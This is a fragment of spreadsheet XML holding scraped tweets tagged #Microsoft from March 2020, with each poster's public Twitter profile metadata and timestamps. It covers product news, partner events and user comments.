    <t>Another App in a day at #Microsoft Next generation citizen developers in the works!!
#PowerApps #poweraddicts #PowerPlatform @MicrosoftNorge @point_taken_ https://t.co/cPDz6Oz0SC</t>
  </si>
  <si>
    <t>{'id': 1103367884401709056, 'id_str': '1103367884401709056', 'name': 'Thomas SandsÃ¸r | CRM Keeper ðŸ‡³ðŸ‡´', 'screen_name': 'CrmKeeper', 'location': 'Oslo, Norway', 'description': 'https://t.co/pobDoYjiJU\nDynamics 365 fanatic by day, goalkeeper by night!âš½ï¸ #d365blackops #beachsoccer #poweraddict\n\nIG: thomassandsor', 'url': 'https://t.co/ABWjsmcUql', 'entities': {'url': {'urls': [{'url': 'https://t.co/ABWjsmcUql', 'expanded_url': 'http://www.crmkeeper.com', 'display_url': 'crmkeeper.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/pobDoYjiJU', 'expanded_url': 'https://nordicsummit.info/', 'display_url': 'nordicsummit.info', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 457, 'friends_count': 709, 'listed_count': 3, 'created_at': 'Wed Mar 06 18:52:58 +0000 2019', 'favourites_count': 1216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 523, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103367973610360834/3Rdn42jm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103367973610360834/3Rdn42jm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103367884401709056/1552000461',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</si>
  <si>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15:00:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Power Automate adds robotic process automation in April via Charles Lamanna #PowerPlatform https://t.co/IjElerSfuR</t>
  </si>
  <si>
    <t>Are you wondering if Office365 is right for your office? In this short video you will find out the Office365 features and pros &amp;amp; cons. #andromedats #office365 #microsoft https://t.co/6tTiULvrsE https://t.co/cxWYmDhkmY</t>
  </si>
  <si>
    <t>{'id': 837033446740488196, 'id_str': '837033446740488196', 'name': 'Andromeda', 'screen_name': 'AndromedaTS', 'location': 'Lockport, IL', 'description': 'Technology company specializing in IT Data Networks, Telephone Systems, Web Design &amp; SEO, and Integrated Security within the Chicagoland Area. Call 815-836-0030', 'url': 'https://t.co/ojIPUgGz3R', 'entities': {'url': {'urls': [{'url': 'https://t.co/ojIPUgGz3R', 'expanded_url': 'http://www.wenetwork.com', 'display_url': 'wenetwork.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 785, 'friends_count': 815, 'listed_count': 7, 'created_at': 'Wed Mar 01 20:14:59 +0000 2017', 'favourites_count': 607, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1482,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'http://pbs.twimg.com/profile_images/838797817023864833/rzjvtugV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/838797817023864833/rzjvtugV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/837033446740488196/1554130082', 'profile_link_color': 'ED1C24',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</si>
  <si>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14:57:09 +0000 2020</t>
  </si>
  <si>
    <t>Which is more preferable? PowerShell or Python? #PowerShell #SysAdmin #Desktop #Microsoft #opensource</t>
  </si>
  <si>
    <t>{'id': 4352130688, 'id_str': '4352130688', 'name': 'Artemis', 'screen_name': 'Pretti_Peachie', 'location': '', 'description': 'ðŸ’™ðŸ’› AGGIE PRIDE ðŸ’™ðŸ’›', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 649, 'listed_count': 2, 'created_at': 'Wed Dec 02 16:00:40 +0000 2015', 'favourites_count': 3272, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1554,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'http://pbs.twimg.com/profile_images/1075958657995694080/I6Ocvscy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1075958657995694080/I6Ocvscy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4352130688/1545363511',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</si>
  <si>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14:57:00 +0000 2020</t>
  </si>
  <si>
    <t>Really informative session today at our Microsoft 365 SMB Sales Bootcamp with Steve Smith! 
Thanks to all attending Partners, we hope you've enjoyed the session! 
#microsoft #sales #MSP https://t.co/EW8vIrmNH6</t>
  </si>
  <si>
    <t>{'id': 269880064, 'id_str': '269880064', 'name': 'intY, a ScanSource Company', 'screen_name': 'intYLtd', 'location': 'global', 'description': "Join the 1000s of happy partners, who've signed up and get access to the best #CloudServices at the best prices!", 'url': 'http://t.co/YzCQEVo3cL', 'entities': {'url': {'urls': [{'url': 'http://t.co/YzCQEVo3cL', 'expanded_url': 'http://www.inty.com', 'display_url': 'inty.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 974, 'friends_count': 1966, 'listed_count': 45, 'created_at': 'Mon Mar 21 16:26:57 +0000 2011', 'favourites_count': 991, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1582,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'http://pbs.twimg.com/profile_images/1221816904165285888/KlkfjJAa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1221816904165285888/KlkfjJAa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/269880064/1580229305', 'profile_link_color': 'FF691F',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</si>
  <si>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14:56:11 +0000 2020</t>
  </si>
  <si>
    <t>We are delighted to host our Microsoft Azure Driving Business Impact Event on March 19th at @AirfieldEstate Dundrum, just minutes from the M50 and minutes walk from the LUAS. HAVE YOU REGISTERED? https://t.co/JPTjGJ8BOx #INNOVATEwithAzure #Microsoft #Azure #ITSolutionsPeople https://t.co/ScZtV9T1gP</t>
  </si>
  <si>
    <t>{'id': 289837464, 'id_str': '289837464', 'name': 'INNOVATE', 'screen_name': 'InnovateCloud', 'location': 'Ireland', 'description': 'INNOVATE - Providing Managed IT services &amp; Professional Services across Cloud Infrastructure, Cloud Productivity, Networking, Communications &amp; Security.', 'url': 'http://t.co/IAOpXmAbRt', 'entities': {'url': {'urls': [{'url': 'http://t.co/IAOpXmAbRt', 'expanded_url': 'http://www.innovate.ie', 'display_url': 'innovate.ie', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2249, 'friends_count': 2284, 'listed_count': 70, 'created_at': 'Fri Apr 29 09:06:28 +0000 2011', 'favourites_count': 1598, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2263,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'http://pbs.twimg.com/profile_images/903229681574563840/YotIOV64_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/903229681574563840/YotIOV64_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/289837464/1578053047',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</si>
  <si>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14:55:38 +0000 2020</t>
  </si>
  <si>
    <t>$LINK #MICROSOFT #CONSENSYS https://t.co/uTNHAjDNJu</t>
  </si>
  <si>
    <t>{'id': 120588403, 'id_str': '120588403', 'name': 'When Moon', 'screen_name': '_WhenMoon_', 'location': 'The Netherlands', 'description': 'Ready for the Blockchain revolution? â–ª Bitcoin $BTC â–ª ChainLink $LINK â–ª ShareRing $SHR â–ª Spectre $SXDT â–ª WanChain $WAN â–ª ICON $ICX', 'url': 'https://t.co/FYrn8447EM', 'entities': {'url': {'urls': [{'url': 'https://t.co/FYrn8447EM', 'expanded_url': 'http://chain.link', 'display_url': 'chain.link', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 209, 'friends_count': 159, 'listed_count': 1, 'created_at': 'Sat Mar 06 22:51:53 +0000 2010', 'favourites_count': 8955, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3432,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'http://pbs.twimg.com/profile_images/1198193244040884226/zkxsvSb1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198193244040884226/zkxsvSb1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/120588403/1581939280',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</si>
  <si>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14:55:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Feature Selection In Machine Learning #udemycoupon -&amp;gt; https://t.co/B1Bv2s7dhk
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Wed Mar 04 14:52:49 +0000 2020</t>
  </si>
  <si>
    <t>Are Macs Really More Secure? https://t.co/GfFVC6yXNu
When it comes to #cybersecurity, why do people think #Apple does it better than #Microsoft, and is that fair?
cc: @tqbf @MrMeritology @SpireSec</t>
  </si>
  <si>
    <t>{'id': 1217927571947577346, 'id_str': '1217927571947577346', 'name': 'BlueTeam', 'screen_name': 'GetBlueTeam', 'location': 'New York, NY', 'description': 'BlueTeam provides defense at scale for fast growing companies. We are the cybersecurity talent marketplace for FinTech and Digital Health.', 'url': 'https://t.co/hUdjbzfo7a', 'entities': {'url': {'urls': [{'url': 'https://t.co/hUdjbzfo7a', 'expanded_url': 'https://www.getblueteam.com', 'display_url': 'getblueteam.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Thu Jan 16 21:52:41 +0000 2020', 'favourites_count': 5,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'http://pbs.twimg.com/profile_images/1224676197361233920/bpEPOFsF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224676197361233920/bpEPOFsF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1217927571947577346/1583132353',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</si>
  <si>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14:49:09 +0000 2020</t>
  </si>
  <si>
    <t>The Evolution Of #Apple | The real ... | https://t.co/iEi4bfj2yT #ArtificialIntelligence #Corporate #DagKittlaus #Dixons #Economics #FiniteLoop #Freemarket #Innovation #ITunes #JohnBrowett #Meritocracy #Microsoft #OEM #Quicktime #RadioShack #ScottForstall #Siri #SRI #SteveJobs</t>
  </si>
  <si>
    <t>Wed Mar 04 14:49:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Corp. and #Accenture are teaming to help Entrepreneurs Amplify social impact through #Cloud &amp;amp; #AI. @Accenture @Microsoft 
https://t.co/5A8K2Tnyiz</t>
  </si>
  <si>
    <t>{'id': 3008735148, 'id_str': '3008735148', 'name': 'TechGenyz', 'screen_name': 'TechGenyz', 'location': 'Kolkata, West Bengal', 'description': 'A tech community | #News on #Technology, #Gaming, #VR, #Apps and #FutureTech Stories | Empowering the generation Y&amp;Z | DM us for tip or visit https://t.co/KOzX13nh9i', 'url': 'https://t.co/bFCPbifsOq', 'entities': {'url': {'urls': [{'url': 'https://t.co/bFCPbifsOq', 'expanded_url': 'https://www.techgenyz.com', 'display_url': 'techgenyz.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/KOzX13nh9i', 'expanded_url': 'http://bit.ly/2SMqUyL', 'display_url': 'bit.ly/2SMqUyL', 'indices': [142, 165]}]}}, 'protected': False, 'followers_count': 20301, 'friends_count': 13434, 'listed_count': 264, 'created_at': 'Tue Feb 03 04:49:07 +0000 2015', 'favourites_count': 1962, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10003,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'http://pbs.twimg.com/profile_images/1176587544726687746/2idDqkLY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176587544726687746/2idDqkLY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3008735148/1569355268', 'profile_link_color': 'FC0562',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</si>
  <si>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14:48:50 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Our engineers are so excited!
 Now we can begin new development projects with our device of augmented reality, the Microsoft HoloLens 2!
 Evelyn has been learning about the new glasses.
 #Microsoft #HoloLens2 #AR #developing #learning #advanced #hungary https://t.co/WGmwX825U2</t>
  </si>
  <si>
    <t>{'id': 1085518734394048512, 'id_str': '1085518734394048512', 'name': 'am-LAB', 'screen_name': 'amlabhungary', 'location': 'Szombathely, Hungary', 'description': '', 'url': 'https://t.co/NU4PK8144J', 'entities': {'url': {'urls': [{'url': 'https://t.co/NU4PK8144J', 'expanded_url': 'http://www.amlab.hu/en/index.php', 'display_url': 'amlab.hu/en/index.php', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 4, 'listed_count': 0, 'created_at': 'Wed Jan 16 12:46:49 +0000 2019', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1085519273446047745/qSOyRffN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085519273446047745/qSOyRffN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1085518734394048512/1547724113',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</si>
  <si>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14:48:33 +0000 2020</t>
  </si>
  <si>
    <t>Exploring Microsoft Flow, been using IFTTT but didn't know Microsoft Flow exists. Interesting...
#microsoft #IFTTT #productivity</t>
  </si>
  <si>
    <t>{'id': 92358436, 'id_str': '92358436', 'name': 'Waqas Abdul Majeed', 'screen_name': 'iowaqas', 'location': 'Dubai, United Arab Emirates', 'description': '3D Artist | #AR &amp; #VR Specialist | Educator | Freelancer on UpWork. Launched Games: @ellenthegame &amp; Deer Man.\n#indiedev #gamedev #b3d #unity3d #upwork', 'url': 'https://t.co/Xdqbn3kPzn', 'entities': {'url': {'urls': [{'url': 'https://t.co/Xdqbn3kPzn', 'expanded_url': 'https://www.upwork.com/o/profiles/users/~016e6e990a0b153249/', 'display_url': 'upwork.com/o/profiles/useâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 562, 'friends_count': 758, 'listed_count': 76, 'created_at': 'Tue Nov 24 20:33:06 +0000 2009', 'favourites_count': 2792, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6086, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '232323', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1175391356484825089/7QBKtPnf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175391356484825089/7QBKtPnf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92358436/1569070113', 'profile_link_color': '6F797D', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '0F0E0F', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:47:02 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft365 Business Voice - The phone system designed for #Office365. Learn More&amp;gt;&amp;gt;https://t.co/6GKonuO855
#Teams
#MicrosoftTeams 
#Microsoft https://t.co/NgTEyxGzdg</t>
  </si>
  <si>
    <t>{'id': 161000289, 'id_str': '161000289', 'name': 'Broadview Networks', 'screen_name': 'Broadview_', 'location': 'Winnipeg, Manitoba', 'description': 'Productivity through #Technology! \n#ManagedServices #ITSupport #CloudComputing #Office365 #Fortinet #BDR', 'url': 'http://t.co/go0gDN8Iwl', 'entities': {'url': {'urls': [{'url': 'http://t.co/go0gDN8Iwl', 'expanded_url': 'http://www.broadviewnetworks.ca', 'display_url': 'broadviewnetworks.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 819, 'friends_count': 874, 'listed_count': 75, 'created_at': 'Tue Jun 29 18:22:23 +0000 2010', 'favourites_count': 631, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10299, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '010540', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/936634130468552704/6C25wE99_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/936634130468552704/6C25wE99_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/161000289/1568843493', 'profile_link_color': '001E87', 'profile_sidebar_border_color': '070747', 'profile_sidebar_fill_color': 'E0CB62', 'profile_text_color': '291E57', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:45:12 +0000 2020</t>
  </si>
  <si>
    <t>How to pair Apple AirPods with a Windows PC #Apple #Airpods #Microsoft #WindowsPC #Pairing via @DigitalTrends https://t.co/eIjFHOLHFY</t>
  </si>
  <si>
    <t>{'id': 765619235657814016, 'id_str': '765619235657814016', 'name': 'STEAMsport, Inc.', 'screen_name': 'realsteamsport', 'location': 'John Hope Community Center', 'description': 'STEAMsport, Inc. is a non profit entity that provides science, technology, engineering arts and math exposure/education to kids from underserved communities.', 'url': 'https://t.co/7cxeaewnV6', 'entities': {'url': {'urls': [{'url': 'https://t.co/7cxeaewnV6', 'expanded_url': 'http://www.steamsport.com', 'display_url': 'steamsport.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 85, 'friends_count': 47, 'listed_count': 4, 'created_at': 'Tue Aug 16 18:40:25 +0000 2016', 'favourites_count': 27, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 510, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/765620996359516164/wPh7h7j9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/765620996359516164/wPh7h7j9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/765619235657814016/1471376391',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</si>
  <si>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14:45:04 +0000 2020</t>
  </si>
  <si>
    <t>Developing Solutions for Microsoft Azure- AZ 203
#azure #microsoft
https://t.co/R1Ytu43uXo</t>
  </si>
  <si>
    <t>Wed Mar 04 14:42:03 +0000 2020</t>
  </si>
  <si>
    <t>#Digital #Transformation and Its Impact In the Workplace | Link &amp;gt;&amp;gt; https://t.co/NOy49TgV1x . Brought to you by https://t.co/IOfL9mFxzG
#Augmented #Azure #Cloud #Digitaltransformation #Disruptive #Iot #Mega #Microsoft #Reality #Trends</t>
  </si>
  <si>
    <t>Wed Mar 04 14:41:09 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco partner responds to Cononavirus with free NHS video consultation offer https://t.co/XEXabGVnVA via @Hybrid_Circle #VMware #Microsoft https://t.co/efkFBszuCb</t>
  </si>
  <si>
    <t>Wed Mar 04 14:41:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft strikes a new #deal with #NFL to have all 32 teams use #MicrosoftTeams https://t.co/NRglpwBLW7 #SankalpIT</t>
  </si>
  <si>
    <t>Wed Mar 04 14:38:29 +0000 2020</t>
  </si>
  <si>
    <t>Deputy Minister of Communications &amp;amp; Digital Technologies Hon. Pinky Kekana- Keynote address. #LimpopoDigitalSummit #Microsoft #ConnectTheWorld #MeropaSun #4IR #PrecisionalGrowth #LimpopoConnect #LimpopoEvents #DigitalChampions #Collaboration #Innovation #SMMEs https://t.co/ea3YvHLl5C</t>
  </si>
  <si>
    <t>Wed Mar 04 14:37:49 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft confirms Live Tiles will not go away, but your Windows 10 Start Menu will look better without them
#microsoft  #windows10 #windows10x #Icons  #icons2020  #startmenu #redesign
https://t.co/EdM5uOe2ag</t>
  </si>
  <si>
    <t>Wed Mar 04 14:34:36 +0000 2020</t>
  </si>
  <si>
    <t>Just in case you missed it:
#Microsoft has confirmed the Following:
12 Teraflops
Games you buy on #XboxOne will automatically become Xbox Series X games when you move to next gen
Up to 120 fps
All controllers from #XboxOne One work on #XboxSeriesX</t>
  </si>
  <si>
    <t>{'id': 725278752, 'id_str': '725278752', 'name': '@XboxDIY', 'screen_name': 'XboxDIY', 'location': 'Global', 'description': 'Xbox One Repair Guides, Tutorials, Articles, and more. https://t.co/wVErvbtVgJ', 'url': 'https://t.co/lJNozGZ8qE', 'entities': {'url': {'urls': [{'url': 'https://t.co/lJNozGZ8qE', 'expanded_url': 'http://www.xboxdiy.com', 'display_url': 'xboxdiy.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/wVErvbtVgJ', 'expanded_url': 'http://www.youtube.com/XboxDIY', 'display_url': 'youtube.com/XboxDIY', 'indices': [55, 78]}]}}, 'protected': False, 'followers_count': 217, 'friends_count': 651, 'listed_count': 2, 'created_at': 'Mon Jul 30 04:32:05 +0000 2012', 'favourites_count': 653, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1232510130928918528/UtFm0LlP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232510130928918528/UtFm0LlP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/725278752/1483910235',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</si>
  <si>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14:32:07 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Zero-Day Bug Allowed Attackers to Register Malicious Domains:" https://t.co/8pXH8xAHvI
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Mar 04 14:30:53 +0000 2020</t>
  </si>
  <si>
    <t>Farewell @Wunderlist , it was a pleasure using your app  https://t.co/qLt3nGrWXe #todo #wunderlist @MicrosoftToDo #microsoft #software</t>
  </si>
  <si>
    <t>{'id': 915552311300239362, 'id_str': '915552311300239362', 'name': 'lukaszkups', 'screen_name': 'lukaszkups', 'location': 'Poland', 'description': 'Just another front-end developer. Tech writer. Working on @writteli &amp; @tavuelo.', 'url': 'https://t.co/oZ98t2zU69', 'entities': {'url': {'urls': [{'url': 'https://t.co/oZ98t2zU69', 'expanded_url': 'https://lukaszkups.net', 'display_url': 'lukaszkups.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 29, 'listed_count': 4, 'created_at': 'Wed Oct 04 12:20:55 +0000 2017', 'favourites_count': 2808, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1189,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'http://pbs.twimg.com/profile_images/1088210611954176000/q9XTdoaK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1088210611954176000/q9XTdoaK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/915552311300239362/1579734104', 'profile_link_color': '1E1E1E',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</si>
  <si>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14:30:14 +0000 2020</t>
  </si>
  <si>
    <t>@IGEL_Technology Announces Availability of the First #Linux Client to Support #Microsoft Windows Virtual Desktop -  https://t.co/JcskkXJZbV</t>
  </si>
  <si>
    <t>{'id': 39765784, 'id_str': '39765784', 'name': 'Christian T. Drieling', 'screen_name': 'cdr87', 'location': 'Delmenhorst, Deutschland', 'description': 'Vice President PreSales EMEA@ IGEL Technology', 'url': 'https://t.co/8sOLxWmnHF', 'entities': {'url': {'urls': [{'url': 'https://t.co/8sOLxWmnHF', 'expanded_url': 'https://apanthos.com', 'display_url': 'apanthos.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 459, 'friends_count': 577, 'listed_count': 14, 'created_at': 'Wed May 13 14:56:52 +0000 2009', 'favourites_count': 1097, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12192,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'http://pbs.twimg.com/profile_images/949594467836813312/YxBgoia4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/949594467836813312/YxBgoia4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39765784/1486472199',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</si>
  <si>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14:30:01 +0000 2020</t>
  </si>
  <si>
    <t>How to secure your devices with #Microsoft #Office365 #Business https://t.co/VFp9RRC71d</t>
  </si>
  <si>
    <t>{'id': 31386868, 'id_str': '31386868', 'name': 'Nutmeg Technologies', 'screen_name': 'NutmegTech', 'location': 'Windsor, CT', 'description': 'We take the complexity out of business communication and IT infrastructure. We deliver technology solutions that meet your business objectives.', 'url': 'https://t.co/iT69cVBZWd', 'entities': {'url': {'urls': [{'url': 'https://t.co/iT69cVBZWd', 'expanded_url': 'https://www.facebook.com/NutmegTech', 'display_url': 'facebook.com/NutmegTech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 599, 'friends_count': 631, 'listed_count': 83, 'created_at': 'Wed Apr 15 11:31:06 +0000 2009', 'favourites_count': 698, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3299, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '085FBE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1115698129117089793/L8UkTQUV_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1115698129117089793/L8UkTQUV_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/31386868/1555433807', 'profile_link_color': 'D02F42', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E00417', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 14:28:11 +0000 2020</t>
  </si>
  <si>
    <t>Shout out to #Microsoft for turning my pc into a useless brick with a security update. Good  work.  #Windows10 https://t.co/IDnDP1bcpA</t>
  </si>
  <si>
    <t>{'id': 2742091237, 'id_str': '2742091237', 'name': 'Danny Smith', 'screen_name': 'IsThisOnOrWhat', 'location': '', 'description': 'Get paid in fullðŸ‡ªðŸ‡¬', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 383, 'listed_count': 3, 'created_at': 'Mon Aug 18 13:24:21 +0000 2014', 'favourites_count': 499, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3135, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '1A1B1F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1027148052329578496/jTcm2vaz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1027148052329578496/jTcm2vaz_normal.jpg',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</si>
  <si>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14:27:10 +0000 2020</t>
  </si>
  <si>
    <t>New #Microsoft #PowerToys version 0.15.1 released for #Windows10 #MicrosoftPowerToys  
See: https://t.co/CfFugDp42Z</t>
  </si>
  <si>
    <t>Wed Mar 04 14:26:41 +0000 2020</t>
  </si>
  <si>
    <t>Last week Optimus was a lecturer in the Microsoft Caribbean Executive Forum in Florida presenting Dynamics running with AI and BI.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #Caribbean #Jamaica #Kingston https://t.co/lElopjzCz4</t>
  </si>
  <si>
    <t>Wed Mar 04 14:26:36 +0000 2020</t>
  </si>
  <si>
    <t>We're happy to announce that #HITS is part of the biggest project #digitaltransformation. Egypt's Public Business Minister Hisham Tawfik attended the signing of 21 contracts in this regard. #Microsoft will take part for the first time in carrying out thishugedigitaltransformation https://t.co/UlJSfh7pDg</t>
  </si>
  <si>
    <t>{'id': 266592133, 'id_str': '266592133', 'name': 'HITS Technologies', 'screen_name': 'HITStechnology', 'location': 'Egypt', 'description': 'HITS is a one stop shop for IoT Solutions including: multi identification, biometric attendance Access Control, and tailored IoT Solutions. in additions to HRMS', 'url': 'http://t.co/IjVLpsxXmX', 'entities': {'url': {'urls': [{'url': 'http://t.co/IjVLpsxXmX', 'expanded_url': 'http://www.hitssolutions.com', 'display_url': 'hitssolutions.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 133, 'friends_count': 113, 'listed_count': 13, 'created_at': 'Tue Mar 15 13:47:01 +0000 2011', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 722,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'http://pbs.twimg.com/profile_images/940486283780067328/77T6args_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/940486283780067328/77T6args_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/266592133/1578990817',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</si>
  <si>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14:25:03 +0000 2020</t>
  </si>
  <si>
